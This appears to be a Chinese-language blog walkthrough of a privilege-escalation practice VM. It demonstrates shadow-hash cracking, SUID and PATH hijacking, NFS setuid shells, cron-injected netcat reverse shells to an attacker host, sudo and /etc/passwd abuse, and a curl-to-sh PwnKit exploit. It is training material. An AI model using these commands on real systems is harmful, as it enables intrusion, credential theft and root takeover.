<\/p>\n\n\n\n
\u8a72\u9776\u6a5f\u63d0\u4f9b\u4ee5\u4e0b\u63d0\u6b0a\u6f0f\u6d1e\u53ef\u4f9b\u7df4\u7fd2<\/p>\n\n\n\n
<\/p>\n\n\n\n
\u5c07LinEnum.sh\u8207PEASS-ng\u653e\u5230\u76ee\u6a19\u4e3b\u6a5f\u4e26\u57f7\u884c\u4ee5\u641c\u96c6\u4e3b\u6a5f\u76f8\u95dc\u4fe1\u606f<\/p>\n\n\n\n
\u4ee5user6\u8eab\u4efd\u57f7\u884c\u9019\u5169\u500b\u5de5\u5177\u767c\u73fe\u4ee5\u4e0b\u60c5\u5831<\/p>\n\n\n\n
\u628a\/etc\/shadow\u8981\u7834\u89e3\u7684\u5167\u5bb9\u8907\u5236\u5230\u653b\u64ca\u6a5f\u5b58\u6210passwd.hash\uff0c\u5982\u4e0b<\/p>\n\n\n\n
root:$6$mqjgcFoM$X\/qNpZR6gXPAxdgDjFpaD1yPIqUF5l5ZDANRTKyvcHQwSqSxX5lA7n22kjEkQhSP6Uq7cPaYfzPSmgATM9cwD1:18050:0:99999:7:::\nuser1:$6$9iyn\/lCu$UxlOZYhhFSAwJ8DPjlrjrl2Wv.Pz9DahMTfwpwlUC5ybyBGpuHToNIIjTqMLGSh0R2Ch4Ij5gkmP0eEH2RJhZ0:18050:0:99999:7:::\nuser2:$6$7gVE7KgT$ud1VN8OwYCbFveieo4CJQIoMcEgcfKqa24ivRs\/MNAmmPeudsz\/p3QeCMHj8ULlvSufZmp3TodaWlIFSZCKG5.:18050:0:99999:7:::\nuser3:$6$PaKeECW4$5yMn9UU4YByCj0LP4QWaGt\/S1aG0Zs73EOJXh.Rl0ebjpmsBmuGUwTgBamqCCx7qZ0sWJOuzIqn.GM69aaWJO0:18051:0:99999:7:::\nuser4:$6$0pxj6KPl$NA5S\/2yN3TTJbPypEnsqYe1PrgbfccHntMggLdU2eM5\/23dnosIpmD8sRJwI1PyDFgQXH52kYk.bzc6sAVSWm.:18051:0:99999:7:::\nuser5:$6$wndyaxl9$cOEaymjMiRiljzzaSaFVXD7LFx2OwOxeonEdCW.GszLm77k0d5GpQZzJpcwvufmRndcYatr5ZQESdqbIsOb9n\/:18051:0:99999:7:::\nuser6:$6$Y9wYnrUW$ihpBL4g3GswEay\/AqgrKzv1n8uKhWiBNlhdKm6DdX7WtDZcUbh\/5w\/tQELa3LtiyTFwsLsWXubsSCfzRcao1u\/:18051:0:99999:7:::\nmysql:$6$O2ymBAYF$NZDtY392guzYrveKnoISea6oQpv87OpEjEef5KkEUqvtOAjZ2i1UPbkrfmrHG\/IonKdnYEec0S0ZBcQFZ.sno\/:18053:0:99999:7:::\nuser7:$6$5RBuOGFi$eJrQ4\/xf2z\/3pG43UkkoE35Jb0BIl7AW\/umj1Xa7eykmalVKiRKJ4w3vFEOEOtYinnkIRa.89dXtGQXdH.Rdy0:18052:0:99999:7:::\nuser8:$6$fdtulQ7i$G9THW4j6kUy4bXlf7C\/0XQtntw123LRVRfIkJ6akDLPHIqB5PJLD4AEyz7wXsEhMc2XC4CqiTxATfb20xWaXP.:18052:0:99999:7:::<\/code><\/pre>\n\n\n\n\u4f7f\u7528john\u7206\u7834\u53d6\u5f97root\u5bc6\u78bc\u70ba12345\uff0c\u5176\u4ed6\u5bc6\u78bc\u592a\u9577\u7834\u89e3\u8f03\u4e45<\/p>\n\n\n\n
# john passwd.hash\nLoaded 10 password hashed with 10 different salts ...omit...\nProceeding with wordlist:\/usr\/share\/john\/password.lst, rules:Wordlist\n12345 [root]<\/code><\/pre>\n\n\n\n
\n\n\n\nsuid\u63d0\u6b0a<\/h2>\n\n\n\n
\u5728user6\u4e2d\u5217\u51fa\u53ef\u4ee5\u7528SUID\u57f7\u884c\u7684\u6307\u4ee4\uff0c\u767c\u73fe\u5728\u6709\u975e\u7cfb\u7d71\u5167\u5efa\u6307\u4ee4\/home\/user3\/shell<\/p>\n\n\n\n
user6$ find \/ -perm -u=s -type f 2>\/dev\/null\n...omit...\n\/home\/user3\/shell\n...omit...<\/code><\/pre>\n\n\n\n\u76f4\u63a5\u57f7\u884c\/home\/user3\/shell\u53ef\u63d0\u6b0a<\/p>\n\n\n\n
user6$ cd \/home\/user3\nuser6$ .\/shell\nwelcome to Linux Lite 4.4\n\nYou are running in superuser mode, be very careful,\n...omit...<\/code><\/pre>\n\n\n\n
\n\n\n\n\u74b0\u5883\u8b8a\u91cf\u63d0\u6b0a<\/h2>\n\n\n\n
\u5728user6\u4e2d\u5217\u51fa\u53ef\u4ee5\u7528root\u57f7\u884c\u7684\u6307\u4ee4\uff0c\u767c\u73fe\u5728\u6709\u975e\u7cfb\u7d71\u5167\u5efa\u6307\u4ee4\/home\/user5\/script<\/p>\n\n\n\n
user6$ find \/ -perm -u=s -type f 2>\/dev\/null\n...omit...\n\/home\/user5\/script\n...omit...<\/code><\/pre>\n\n\n\n\u57f7\u884c \/home\/user5\/script \u6703\u6709ls\u7684\u6548\u679c\uff0c\u56e0\u6b64\u9019\u500b\u8173\u672c\u662f\u7528root\u6b0a\u9650\u57f7\u884cls\u547d\u4ee4<\/p>\n\n\n\n
<\/p>\n\n\n\n
\u56e0\u6b64\u53ea\u8981\u628a\/tmp\/ls\u7684\u904b\u4f5c\u6539\u70ba\u57f7\u884cshell\uff0c\u5728\u628a\/tmp\/ls\u52a0\u5165PATH\u8b8a\u6578\u7684\u7b2c\u4e00\u500b\u76ee\u9304\uff0c\u53ea\u8981\u57f7\u884cls\u6642\u5c31\u6703\u512a\u5148\u57f7\u884c\/tmp\/ls\uff0c\u7136\u5f8c\u5c31\u6703\u57f7\u884cshell<\/p>\n\n\n\n
user6$ echo \"\/bin\/bash\" > \/tmp\/ls\nuser6$ chmod 777 \/tmp\/ls\nuser6$ export PATH=\/tmp:$PATH\nuser6$ echo $PATH \n\/tmp:\/user\/local\/sbin:\/usr\/local\/bin:\/usr\/sbin:\/usr\/bin:\/sbin:\/bin\nuser6$ \/home\/user5\/script\nwelcome to Linux Lite 4.4\n\nYou are running in superuser mode, be very careful,\n...omit...<\/code><\/pre>\n\n\n\n
\n\n\n\nNFS\u63d0\u6b0a<\/h2>\n\n\n\n
\u5728\u76ee\u6a19\u4e3b\u6a5f\u767c\u73fenfs\u914d\u7f6e\u4e0d\u7576\u53ef\u5c0e\u81f4\u76f4\u63a5\u63d0\u6b0a\uff0c\u9ed8\u8a8d\u9060\u7a0broot\u7528\u6236\u9023\u63a5NFS\u6703\u5206\u914dnfsnobody\u7684\u5c0f\u6b0a\u9650\u7528\u6236\uff0c\u4f46\u5982\u679c\u555f\u7528no_root_squash\u9078\u9805\u5247\u70ba\u9060\u7a0b\u7528\u6236\u6388\u4e88root\u6b0a\u9650<\/p>\n\n\n\n
user6$ cat \/etc\/exports\n...omit...\n\/home\/user5 *(rw,no_root_squash)\n...omit...<\/code><\/pre>\n\n\n\n<\/p>\n\n\n\n
\u5728\u653b\u64ca\u6a5f\uff0c\u639b\u8f09\u9060\u7a0b\u76ee\u6a19\u4e3b\u6a5fNFS\u5230\u672c\u5730<\/p>\n\n\n\n
attacker:\/# mount -t nfs 192.168.0.111:\/home\/user5\/ \/mnt -o nolock\nattacker:\/# cd \/mnt\nattacker:\/mnt# <\/code><\/pre>\n\n\n\n<\/p>\n\n\n\n
\u5efa\u7acbsuid-shell.c\u5167\u5bb9\u5982\u4e0b<\/p>\n\n\n\n
#include <stdio.h> \n#include <stdlib.h> \n#include <sys\/types.h> \n#include <unistd.h> \nint main() { setuid(0); system(\"\/bin\/bash\"); return 0; }<\/code><\/pre>\n\n\n\n\u57f7\u884c\u7de8\u8b6f\u6307\u4ee4gcc suid-shell.c -o suid-shell<\/code> \u4e26\u7d66suid\u6b0a\u9650chmod +s suid-shell<\/code><\/p>\n\n\n\n<\/p>\n\n\n\n
\u56de\u5230\u76ee\u6a19\u4e3b\u6a5f\uff0c\u57f7\u884csuid-shell\uff0c\u5373\u53ef\u53d6\u5f97root\u6b0a\u9650\u7684shell<\/p>\n\n\n\n
user6$ \/home\/user5\/suid-shell\nwelcome to Linux Lite 4.4\n\nYou are running in superuser mode, be very careful,\n...omit...<\/code><\/pre>\n\n\n\n<\/p>\n\n\n\n
\u53e6\u4e00\u7a2e\u65b9\u6cd5\u662f\u8907\u5236bin\/sh\u5230\u639b\u8f09\u7684\u76ee\u9304\uff0c\u4f46\u6709\u4e9b\u4eba\u57f7\u884c\u5931\u6557<\/p>\n\n\n\n
attacker:\/mnt# cp \/bin\/sh rootsh \nattacker:\/mnt# chown root:root rootsh \nattacker:\/mnt# chmod 4755 rootsh <\/code><\/pre>\n\n\n\n
\n\n\n\n<\/p>\n\n\n\n
mysql\u53d6\u5f97\u654f\u611f\u4fe1\u606f<\/h2>\n\n\n\n
\u7531\u65bc\u5df1\u77e5mysql\u5bc6\u78bc\u70baroot\uff0c\u56e0\u6b64\u53ef\u4ee5\u76f4\u63a5\u767b\u5165\uff0c\u4e26\u5728user_info\u8868\u4e2d\u767c\u73femysql\u7684\u5bc6\u78bc<\/p>\n\n\n\n
mysql> use user;\nmysql> select * from user_info;\n+-----------+-------------+\n| usernmame | password |\n+-----------+-------------+\n| mysql | mysql@12345 |\n+-----------+-------------+ <\/code><\/pre>\n\n\n\n\u4f7f\u7528\u6578\u64da\u5eab\u767c\u73fe\u7684mysql\u5bc6\u78bc\u767b\u5165\u76ee\u6a19\u4e3b\u6a5f\u53ef\u6210\u529f\u767b\u5165<\/p>\n\n\n\n
user6$ su mysql\npassword: mysql@12345\nmysql@osboxes:\/var\/www\/html$ whoami\nmysql<\/code><\/pre>\n\n\n\n\u5c0b\u627emysql\u6240\u5c6c\u7684\u6587\u4ef6\uff0c\u767c\u73fe\u6709\u500b\u6587\u4ef6\u5f88\u7279\u5225.user_informations<\/code><\/p>\n\n\n\nmysql@osboxes:\/var\/www\/html$ find \/ -user mysql\n...omit...\n---------- 1 mysql mysql 126 Jun 6 2019 .user_informations\n...omit...\nmysql@osboxes:\/var\/www\/html$ chmod +r .user_informations\nmysql@osboxes:\/var\/www\/html$ cat .user_informations\n# user2:user2@12345\n# user3:user3@12345\n# user4:user4@12345\n#.user5:user5@12345\n# user6:user6@12345\n# user7:user7@12345\n# user8:user8@12345<\/code><\/pre>\n\n\n\n\u6253\u958b\u5f8c\u767c\u73feuser2\u5230user8\u7684\u5bc6\u78bc\u8a18\u9304\u5728\u88e1\u9762<\/p>\n\n\n\n
\n\n\n\n<\/p>\n\n\n\n
crontab\u63d0\u6b0a<\/h2>\n\n\n\n
\u5728user4\u76ee\u9304\u5167\uff0c\u6709root\u6b0a\u9650\u53ef\u57f7\u884cautoscript.sh\uff0c\u4f46user6\u7121\u6cd5\u6539autoscript.sh\uff0c\u56e0\u6b64\u8981\u5148\u767b\u5165\u5230user4\u4e2d<\/p>\n\n\n\n
user6$ cat \/etc\/crontab\n# *\/5 * * * * root \/home\/user4\/Desktop\/autoscript.sh<\/code><\/pre>\n\n\n\n\u5230user4\u5f8c\uff0c\u5c07\u53cd\u5411shell\u63d2\u5165autoscript.sh\uff0c\u6bcf5\u5206\u9418\u5c31\u6703\u57f7\u884c\u4e26\u89f8\u767c\u53cd\u5411shell<\/p>\n\n\n\n
user4$ echo 'rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/bash -i 2>&1|nc xx.xx.xx.xx 1234 >\/tmp\/f' > \/home\/user4\/Desktop\/autoscript.sh<\/code><\/pre>\n\n\n\n\u6216<\/p>\n\n\n\n
user4$ echo \"mkfifo \/tmp\/vnfr; nc 192.168.226.3 8833 0<\/tmp\/vnfr | \/bin\/sh >\/tmp\/vnfr 2>&1; rm \/tmp\/vnfr\" > home\/user4\/Desktop\/autoscript.sh<\/code><\/pre>\n\n\n\n\u63a5\u8457\u53ea\u8981\u5728xx.xx.xx.xx\u4e3b\u6a5f\u76e3\u807d1234 port\uff0c\u5c31\u53ef\u4ee5\u53d6\u5f97root\u6b0a\u9650<\/p>\n\n\n\n
# nc -vlp 1234\nlistening on [any] 1234 ...\nconnect to [xx.xx.xx.xx] from (UNKNOWN) [1.1.1.1] 56789\nwhoami\nroot<\/code><\/pre>\n\n\n\n
\n\n\n\nsudoers\u63d0\u6b0a 1<\/h2>\n\n\n\n
\u767b\u5165user8\u4e2d\uff0c\u5728user8\u767c\u73fevi\u6709root\u6b0a\u9650<\/p>\n\n\n\n
$ sudo -l\n...omit...\n(root) NOPASSWD: \/usr\/bin\/vi<\/code><\/pre>\n\n\n\n\u6253\u958bvi\u5f8c\u8f38\u5165:!sh\u5373\u53ef\u7372\u5f97root\u7684shell<\/p>\n\n\n\n
$ sudo vi\n:!sh\n#\n# whoami\nroot\n#<\/code><\/pre>\n\n\n\n<\/p>\n\n\n\n
sudoers\u63d0\u6b0a 2<\/h2>\n\n\n\n
\u5728user2\u4e2d\uff0c\u767c\u73fe\u53ef\u7528user1\u57f7\u884c\u5404\u7a2e\u547d\u4ee4\uff0c\u56e0\u6b64\u53ef\u63a5\u7ba1user1<\/p>\n\n\n\n
user2$ sudo -l\n...omit...\nUser user2 may run the following commands on osboxes:\n (user1) ALL\nuser2$ sudo -u user1 \/bin\/bash\nwelcome to Linux Lite 4.4\nuser1$<\/code><\/pre>\n\n\n\n\u9032\u5165user1\u5f8c\u767c\u73fe\uff0c\u53ef\u76f4\u63a5\u7528sudo su<\/code>\u63d0\u6b0aroot<\/p>\n\n\n\nuser1$ sudo -l\n...omit...\nUser user1 may run the following commands on osboxes:\n (ALL : ALL) ALL\nuser1$ sudo su\nwelcome to Linux Lite 4.4\n\nYou are running in superuser mode, be very careful.\nroot#<\/code><\/pre>\n\n\n\n
\n\n\n\n\u654f\u611f\u6587\u4ef6\u63d0\u6b0a<\/h2>\n\n\n\n
\u767b\u5165user7<\/p>\n\n\n\n
\u5728user7\u4e2d\uff0c\u767c\u73fe\/etc\/passwd\u540c\u7d44\u53ef\u5beb<\/p>\n\n\n\n
user7$ ls -l \/etc\/passwd\n# -rw-rw-r-- 1 root root 2648 Jun 5 2019 \/etc\/passwd<\/code><\/pre>\n\n\n\n\u5728\/etc\/group\u53ef\u4ee5\u770b\u5230uer4\u548cuser7\u662froot\u7fa4\u7d44<\/p>\n\n\n\n
user7$ cat \/etc\/group\nroot:x:0:user4,user7\n...omit...<\/code><\/pre>\n\n\n\n\u96d6\u7136user7\u6c92\u6709root\u6b0a\u9650\uff0c\u4f46\u662froot\u7fa4\u7d44\u7684\uff0c\u56e0\u6b64\u53ef\u4ee5\u76f4\u63a5\u6539\/etc\/passwd<\/p>\n\n\n\n
user7$ id\nuid=1006(user7) gid=0(root) groups=0(root)\nuser7$ echo \"root7:$(openssl passwd -1 -salt root7 12345):0:0:root:\/root:\/bin\/bash\" >> \/etc\/passwd\nuser7$ su root7\nPassword: 12345\n\nwelcome to Linux Lite 4.4\n\nYou are running in superuser mode, be very careful,\n...omit...<\/code><\/pre>\n\n\n\n<\/p>\n\n\n\n
\n\n\n\n\u6f0f\u6d1e\u63d0\u6b0apkexec<\/h2>\n\n\n\n
\u6aa2\u67e5\u7248\u672c\u767c\u73fe\u6709CVE-2021-4034 \u6f0f\u6d1e\uff0c\u4e0b\u8f09\u6f0f\u6d1e\u5229\u7528\u5de5\u5177<\/p>\n\n\n\n
# wget xxx\/CVE-2021-4034-main.zip > \/tmp\/CVE-2021-4034-main.zip\nunzip CVE-2021-4034-main.zip && cd CVE-2021-4034-main && make && .\/cve-2021-4034\nwhoami\n# root<\/code><\/pre>\n\n\n\n\u6216\u8005\u4e5f\u53ef\u4ee5\u53c3\u8003https:\/\/github.com\/ly4k\/PwnKit<\/code>\u7684\u65b9\u6cd5<\/p>\n\n\n\nsh -c \"$(curl -fsSL https:\/\/raw.githubusercontent.com\/ly4k\/PwnKit\/main\/PwnKit.sh)\"<\/pre>\n\n\n\n<\/p>\n\n\n\n
\n\n\n\n\u6f0f\u6d1e\u63d0\u6b0asudo<\/h2>\n\n\n\n
\u67e5\u8a62sudo\u7248\u672c<\/p>\n\n\n\n
sudo --version<\/code><\/pre>\n\n\n\n\u767c\u73fe\u4f7f\u7528\u4e0d\u5b89\u5168\u7684\u7248\u672c 1.8.21.2\uff0c\u53ef\u4ee5\u4f7f\u7528https:\/\/github.com\/blasty\/CVE-2021-3156<\/a>\u5de5\u5177\u63d0\u6b0a\uff0c\u8209\u4f8b\u5982\u4e0b<\/p>\n\n\n\n.\/sudo-hax-me-a-sandwich<\/code><\/pre>\n\n\n\nrefer
https:\/\/medium.com\/mii-cybersec\/privilege-escalation-cve-2021-3156-new-sudo-vulnerability-4f9e84a9f435<\/a><\/p>\n\n\n\n
\n\n\n\n\u53c3\u8003\u8cc7\u6599
https:\/\/www.cnblogs.com\/autopwn\/p\/13804500.html<\/a>
https:\/\/blog.csdn.net\/qq_34801745\/article\/details\/104144580<\/a>
https:\/\/tari.moe\/2022\/escalate-linux-1.html<\/a>
https:\/\/www.hackingarticles.in\/escalate_linux-vulnhub-walkthrough-part-1<\/a>
Linux\u63d0\u6743\u59ff\u52bf\u603b\u7ed3 https:\/\/l0n9w4y.cc\/posts\/29809<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"\u4ecb\u7d39\u4e86\u591a\u7a2e\u63d0\u6b0a\u6f0f\u6d1e\u7684\u5229\u7528\u65b9\u6cd5\uff0c\u5305\u62ec\u6a6b\u5411\u8207\u7e31\u5411\u63d0\u6b0a\u3001NFS\u914d\u7f6e\u4e0d\u7576\u3001SUID\u57f7\u884c\u7b49\u3002\u900f\u904e\u8cc7\u6599\u641c\u96c6\u548c\u5bc6\u78bc\u7834\u89e3\u7b49\u6280\u8853\uff0c\u4e26\u8a73\u7d30\u8b1b\u89e3\u4e86\u5982\u4f55\u7372\u53d6root\u6b0a\u9650\uff0c\u4e26\u5217\u8209\u4e86\u591a\u500b\u6f0f\u6d1e\u4ee5\u53ca\u5177\u9ad4\u7684\u653b\u64ca\u6b65\u9a5f\u3002<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[27],"tags":[],"class_list":["post-1908","post","type-post","status-publish","format-standard","hentry","category-hackerskill"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1908","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=1908"}],"version-history":[{"count":0,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1908\/revisions"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=1908"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=1908"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=1908"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}